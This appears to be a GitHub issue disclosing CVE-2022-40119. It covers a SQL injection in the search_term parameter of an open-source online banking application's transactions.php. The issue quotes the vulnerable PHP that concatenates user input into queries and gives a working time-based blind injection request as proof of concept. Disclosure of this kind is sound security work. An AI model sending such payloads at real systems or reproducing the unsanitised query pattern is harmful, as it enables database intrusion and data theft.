Headline
CVE-2022-40119: Found a vulnerability · Issue #11 · zakee94/online-banking-system
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the search_term parameter at /net-banking/transactions.php.
Vulnerability file address
net-banking/transactions.php from line 28,The $_POST[‘search_term’] parameter is controllable, the parameter search_term can be passed through post, and the $_POST[‘search_term’] is not protected from sql injection, line 170 $result = $conn->query($sql0); made a sql query,resulting in sql injection
… … … if (isset($_POST[‘search_term’])) { $_SESSION[‘search_term’] = $_POST[‘search_term’]; } if (isset($_POST[‘date_from’])) { $_SESSION[‘date_from’] = $_POST[‘date_from’]; } if (isset($_POST[‘date_to’])) { $_SESSION[‘date_to’] = $_POST[‘date_to’]; }
// Filter indicator variable
$filter\_indicator = "None";
// Queries when search is set
if (!empty($\_SESSION\['search\_term'\])) {
$sql0 .= " WHERE remarks COLLATE latin1\_GENERAL\_CI LIKE '%".$\_SESSION\['search\_term'\]."%'";
$filter\_indicator = "Remarks";
if (!empty($\_SESSION\['date\_from'\]) && empty($\_SESSION\['date\_to'\])) {
$sql0 .= " AND trans\_date > '".$\_SESSION\['date\_from'\]." 00:00:00'";
$filter\_indicator = "Remarks & Date From";
}
if (empty($\_SESSION\['date\_from'\]) && !empty($\_SESSION\['date\_to'\])) {
$sql0 .= " AND trans\_date < '".$\_SESSION\['date\_to'\]." 23:59:59'";
$filter\_indicator = "Remarks & Date To";
}
if (!empty($\_SESSION\['date\_from'\]) && !empty($\_SESSION\['date\_to'\])) {
$sql0 .= " AND trans\_date BETWEEN '".$\_SESSION\['date\_from'\]." 00:00:00' AND '".$\_SESSION\['date\_to'\]." 23:59:59'";
$filter\_indicator = "Remarks, Date From & Date To";
}
}
// Queries when search is not set
if (empty($\_SESSION\['search\_term'\])) {
if (!empty($\_SESSION\['date\_from'\]) && empty($\_SESSION\['date\_to'\])) {
$sql0 .= " WHERE trans\_date > '".$\_SESSION\['date\_from'\]." 00:00:00'";
$filter\_indicator = "Date From";
}
if (empty($\_SESSION\['date\_from'\]) && !empty($\_SESSION\['date\_to'\])) {
$sql0 .= " WHERE trans\_date < '".$\_SESSION\['date\_to'\]." 23:59:59'";
$filter\_indicator = "Date To";
}
if (!empty($\_SESSION\['date\_from'\]) && !empty($\_SESSION\['date\_to'\])) {
$sql0 .= " WHERE trans\_date BETWEEN '".$\_SESSION\['date\_from'\]." 00:00:00' AND '".$\_SESSION\['date\_to'\]." 23:59:59'";
$filter\_indicator = "Date From & Date To";
}
}
… … …
<?php
$result = $conn\->query($sql0);
… … …
POC
POST /net-banking/transactions.php?cust_id=1 HTTP/1.1 Host: www.bank.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 12
search_term=’ AND (SELECT 5964 FROM (SELECT(SLEEP(5)))doHk)-- TErm
Attack results pictures